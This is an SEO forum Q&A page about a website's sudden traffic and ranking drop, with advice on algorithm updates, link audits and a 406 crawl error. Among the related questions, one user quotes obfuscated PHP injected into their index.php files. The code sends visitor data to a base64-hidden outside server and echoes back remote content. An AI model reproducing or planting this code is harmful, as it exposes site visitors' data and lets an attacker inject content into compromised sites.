Sudden Drop in Website Traffic Last month
-
Can any one help me. One of my website http://www.imperialcard.com.au/ suddenly started to drop in traffic and ranking. I havent done anything black hat. How do I figure out what caused this. Thanks
-
More information
-
Check out RevCom's answer.
Then check this out:
- Did you get affected in the middle or the last week of the month? Check your traffic.
If you were, then you got affected by the algorithm updates during those times.
You MAY or MAY NOT have been affected by it. Maybe the links pointing to your were affected, maybe something changed in the keyword/niche rankings, maybe it's showing other new things now that pushed you a bit lower.
Now you can check out Andy's answer and do a link audit to see why you got affected.
As for the www. non www -> be sure to add the current one to webmaster tools as well.
-
|
Page Title
|
***from Majestic SEO
URL Searched For
|
http://www.imperialcard.com.au/
URL Last Crawled
|
13 Oct 2014
Last Crawl Result
|
HTTP_406_NotAcceptable
|
I did a quick check to see if you had tons of back link and got hit by the Penguin update, but you have 337 back links, but majestic seo also said there was a 406 issue on the last crawl. This is probably what effected your traffic.
Here is what can cause it and how to fix - http://www.inmotionhosting.com/support/website/error-numbers/406-error
-
When last month? Could it have been the Penguin/panda update? You can check by comparing your visits/serp with release dates of updates. You can see (some of) them here - http://moz.com/google-algorithm-change and here http://algoroo.com/
-
Hi Andy,
Thanks for your reply. Yes I checked webmaster and there is no warning. As I far I can remember I changed by website from non WWW to WWW redirection in the month of August.
Yes we have more Directory listing which I shouldnt be relying on . I am just worried whether the website being affected by any Google update . How do I check that?
-
is there any warnings in your Webmaster tools, this is the first place I would check.
I can see that on 29/8 you lost all your search visibility (according to Search metrics).
From looking at Opensite explorer - its look like you have a lot of directory links a high %, this would be my best guest to your sudden drop.
I would do a full link analysis, and remove any toxic links - http://moz.com/blog/link-audit-guide-for-effective-link-removals-risk-mitigation
I would then go about creating more natural links. Earning links through good quality content, rather than relying on directory links to boost your link profile.
Got a burning SEO question?
Subscribe to Moz Pro to gain full access to Q&A, answer questions, and ask your own.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
Is buying traffic from Internet traffic club harmful to rankings
From looking at one of our clients’ GA stats, we’ve discovered that they have signed up with a site called Internet Traffic Club (or they have asked someone to do it on their behalf). Their hits on one day went from a fairly standard low number to a few thousand. The hits came from cities all over the world, yet this client is a local UK solicitor offering a local town service. We feel doing this - if they do it regularly - would be harmful rather than beneficial to their rankings. Has anyone here any experience of using these traffic buying services and how Google views these hits? Of course it is also nonsensical to pay to buy traffic from Nigeria if you’re a local solicitor, but I want to explain to them the evidence behind the harmful effect it could have on their rankings.
White Hat / Black Hat SEO | | mfrgolfgti1 -
Google Organic Ranking & Traffic Dropped
Hello, We have been struggling to keep our website (http://goo.gl/vS37qA) ranking well in Google since April 30, 2015. For some reason at that time, there were around 15000 blocked pages (mainly Magento layered navigation pages) showing in Google's Search Console. We used canonical tags, and now all these pages have been removed from Google's index and Google Search Console. We didn't do anything that is against Google's Guidelines. Currently in Google Search Console we see:- Around 50 crawl errors- no malware- no blocked pages - no other error messages in both Webmasters tool.We have never practiced black hat SEO, paid for links, or used tactics that Google penalizes. We noticed in the last few months there are around 1000 Chinese/Russian/Japanese links points to our website, and we have used the disavow tool to notify Google of these attacks.Any help would be greatly appreciated in advance!
White Hat / Black Hat SEO | | NancyH0 -
Website not listing in google - screaming frog shows 500 error? What could the issue be?
Hey, http://www.interconnect.org.uk/ - the site seems to load fine, but for some reason the site is not getting indexed. I tried running the site on screaming frog, and it gives a 500 error code, which suggests it can't access the site? I'm guessing this is the same problem google is having, do you have any ideas as to why this may be and how I can rectify this? Thanks, Andrew
White Hat / Black Hat SEO | | Heehaw0 -
Website has been hacked will this hurt ranking
Today we found out that a website of as has been hacked and that they put this code in multiple index.php files: if (!isset($sRetry))
White Hat / Black Hat SEO | | GTGshops
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?> After some search I found other people mentioning this problem too.They were also talking about that this could have impact on your search rankings. My first question : Will this hurt my rankings ? Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking on this. Grtz, Ard0 -
Copied Content/ Copied Website/
Hello guys, I was checking my product descriptions and I found out that there is a website that is using my descriptions word by word, also they use company name, product images, they have a link that sends you to my site, contact form.. I tried to purchase something and the order came through our email, but i made an inquire and it didn't come through. Also they have a sub-folder with my company name. Also they have url's with my company name, and this isn't right is it? I am confused and honestly I don't know what to do, we don't take part to any affiliation program or anything like that and we don't ship out of Europe. This is a Chinese website. Just for curiosity, I noticed that one of our competitors is there as well, and it does seem weird. Here is the links: www.everychina . com/company/repsole_limited-hz1405d06.html
White Hat / Black Hat SEO | | PremioOscar0 -
I need to find a website I can get guest blogs on for a removal website.
Hello everyone, I need to find a website I can guess blog posts on. Please can someone tell me where I need to look and how the process works: E.g Do i email the blogger saying I'll pay him? Also what categories would work well for removal website. www.van-plus.com to be precise. Thanks in advance!
White Hat / Black Hat SEO | | vanplus1 -
How should I look to gain traffic for a blog hosted on our own site?
Ok I know what you're going to say.. social media etc right? The problem is we do that already but we're stuck in an industry that just isn't very sexy! People reading twitter/facebook don't want to read about toilets in their spare time, or keep it as a hobby. If you search bathroom blog (uk google), you will see we are about 5th, it gets us no traffic, as I imagine it's not a popular term so I can see you starting to ask why we write a blog in the first place. We write the blog because at the moment the whole industry is dominated by pile it high sell it cheap online stores and all their blogs are written for google only so finding decent or unbiased advice is rare. Seriously, these guys are creating fake blogs and paying for links inside other blogs all over the place in order to boost their rankings so we figure if you really want some good advice people can't find it. If they find our blog they will get some good advice and good content.. and then the hope is that they give us a call and we can see if we can help them. The problem is these guys are hogging all the keywords.. and it seems the bathroom industry has very few keywords that people search! Now I know we are in it for the long haul.. so taking time doesn't bother me, but I was wondering if there were any tried and tested places to post a blog that could get us at least seen so that people could see how different our content is? Or if all else fails, can anyone suggest the right keywords to aim at besides the "bathroom suites" etc that these huge online stores dominate?
White Hat / Black Hat SEO | | willryles0